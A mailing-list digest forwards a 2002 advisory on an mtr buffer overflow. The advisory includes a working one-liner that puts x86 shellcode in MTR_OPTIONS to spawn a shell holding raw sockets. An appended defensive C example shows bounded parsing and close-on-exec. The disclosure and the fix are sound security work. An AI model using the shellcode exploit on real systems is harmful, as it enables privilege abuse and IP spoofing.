[Have no clue what mtr is, but people I talked to seem to like it. Please upgrade if you use it -- Raju]

This is an RFC 1153 digest. (1 message)

----------------------------------------------------------------------

Return-Path: <[EMAIL PROTECTED]>
Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
Message-ID: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
X-Virus-Scanned: by AMaViS perl-10
From: Przemyslaw Frasunek <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: mtr 0.45, 0.46
Date: Wed, 6 Mar 2002 15:41:43 +0100

A few days ago, a new version of mtr was released. The authors wrote in the CHANGELOG that they fixed a non-exploitable buffer overflow. In fact, this vulnerability is very easily exploitable and allows an attacker to gain access to a raw socket, which makes IP spoofing and other malicious network activity possible. The sample exploit is TRIVIAL because of the strtok/while loop in the vulnerable code.

clitoris:/home/venglin/mtr-0.45> uname -smr
Linux 2.4.8-26mdk i686
clitoris:/home/venglin/mtr-0.45> setenv MTR_OPTIONS `perl -e 'print "A "x130 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
clitoris:/home/venglin/mtr-0.45> ./mtr
sh-2.05$

At this point, the exec'd shell has a raw socket opened:

clitoris:/home/venglin/mtr-0.45> /usr/sbin/lsof | grep raw
sh 17263 venglin 3u raw 605400 00000000:00FF->00000000:0000 st=07
sh 17263 venglin 4u raw 605401 00000000:0001->00000000:0000 st=07
sh-2.05$ ls -la /proc/self/fd/
total 0
dr-x------ 2 venglin venglin 0 Mar 6 15:40 .
dr-xr-xr-x 3 venglin venglin 0 Mar 6 15:40 ..
lrwx------ 1 venglin venglin 64 Mar 6 15:40 0 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 1 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 2 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 3 -> socket:[605400]
lrwx------ 1 venglin venglin 64 Mar 6 15:40 4 -> socket:[605401]
lr-x------ 1 venglin venglin 64 Mar 6 15:40 5 -> /proc/17318/fd

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43EA93AFA13BE170BF *

------------------------------

End of this Digest
******************

-- 
Raju Mathur [EMAIL PROTECTED] http://kandalaya.org/
It is the mind that moves

_______________________________________________
linux-india-help mailing list
[EMAIL PROTECTED]
https://lists.sourceforge.net/lists/listinfo/linux-india-help
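The advisory above blames a strtok/while loop that stores MTR_OPTIONS tokens into a fixed-size array with no bound, and the lsof and /proc/self/fd listings show why the consequence is more than a crash: the exec'd shell inherits the raw sockets mtr had opened (raw sockets require privilege to create, which is why the program can open them and an ordinary user cannot). The C below is an added example written for this digest; it is not mtr's code and not the author's. It places a bounded tokenizer beside the unbounded pattern the advisory describes, and marks a descriptor close-on-exec so that a process exec'd from the privileged one cannot inherit it. Every name here (split_unbounded, split_bounded, mark_cloexec, is_cloexec, MAX_ARGS, the demo_* functions) is assumed, the 130-token input is constructed to match the shape shown in the advisory, and a pipe stands in for the raw socket because opening a real one needs root.

```c
/* Added example, not mtr's code: bounded option tokenizing plus
 * close-on-exec on privileged descriptors. All names are hypothetical. */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define MAX_ARGS 32  /* assumed array capacity for the demos below */

/* The unbounded shape the advisory describes: tokens are stored until
 * the input runs out, never checked against the array's capacity.
 * Shown for contrast only; it is never called in this file. */
int split_unbounded(char *s, char **argv)
{
    int argc = 0;
    char *tok = strtok(s, " ");
    while (tok != NULL) {
        argv[argc++] = tok;       /* writes past argv once input has more tokens than slots */
        tok = strtok(NULL, " ");
    }
    return argc;
}

/* Bounded version: keeps one slot for the NULL terminator, refuses
 * input with too many tokens (returns -1) instead of writing past the
 * array, and otherwise returns the token count. */
int split_bounded(char *s, char **argv, size_t capacity)
{
    size_t argc = 0;
    if (capacity == 0) return -1;
    for (char *tok = strtok(s, " \t"); tok != NULL; tok = strtok(NULL, " \t")) {
        if (argc + 1 >= capacity) {   /* no room for this token plus NULL */
            argv[argc] = NULL;
            return -1;
        }
        argv[argc++] = tok;
    }
    argv[argc] = NULL;
    return (int)argc;
}

/* Mark fd close-on-exec so an exec'd child does not inherit it. 0 on success. */
int mark_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags == -1) return -1;
    return fcntl(fd, F_SETFD, flags | FD_CLOEXEC) == -1 ? -1 : 0;
}

/* 1 if fd is close-on-exec, 0 if not, -1 if fd is invalid. */
int is_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags == -1) return -1;
    return (flags & FD_CLOEXEC) ? 1 : 0;
}

/* Constructed input of 130 "A " tokens, the shape used in the advisory,
 * fed to the bounded parser with a 32-slot array: expect -1. */
int demo_overflow_rejected(void)
{
    char input[130 * 2 + 1];
    char *argv[MAX_ARGS];
    for (int i = 0; i < 130; i++) { input[2 * i] = 'A'; input[2 * i + 1] = ' '; }
    input[260] = '\0';
    return split_bounded(input, argv, MAX_ARGS);
}

/* An ordinary option string parses fully and is NULL-terminated: expect 4. */
int demo_normal_parse(void)
{
    char input[] = "-n -c 5 host.example";   /* constructed sample */
    char *argv[MAX_ARGS];
    int n = split_bounded(input, argv, MAX_ARGS);
    if (n != 4 || strcmp(argv[0], "-n") != 0 || argv[4] != NULL) return -1;
    return n;
}

/* A pipe stands in for the raw socket. Returns 1 when the flag was
 * clear before marking and set afterwards, 0 otherwise. */
int demo_cloexec(void)
{
    int fds[2];
    if (pipe(fds) == -1) return 0;
    int before = is_cloexec(fds[0]);
    int ok = mark_cloexec(fds[0]) == 0 && is_cloexec(fds[0]) == 1 && before == 0;
    close(fds[0]);
    close(fds[1]);
    return ok ? 1 : 0;
}

int main(void)
{
    printf("130 tokens into %d slots -> %d (expect -1)\n", MAX_ARGS, demo_overflow_rejected());
    printf("normal option string -> %d tokens (expect 4)\n", demo_normal_parse());
    printf("close-on-exec demo -> %d (expect 1)\n", demo_cloexec());
    return 0;
}
```

The two halves address different layers: the bounded parser removes the overflow itself, while FD_CLOEXEC limits what any exec'd process can inherit even if some other defect is found later. Neither replaces the upgrade Raju recommends; they are the checks a reviewer would look for in the fixed code.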
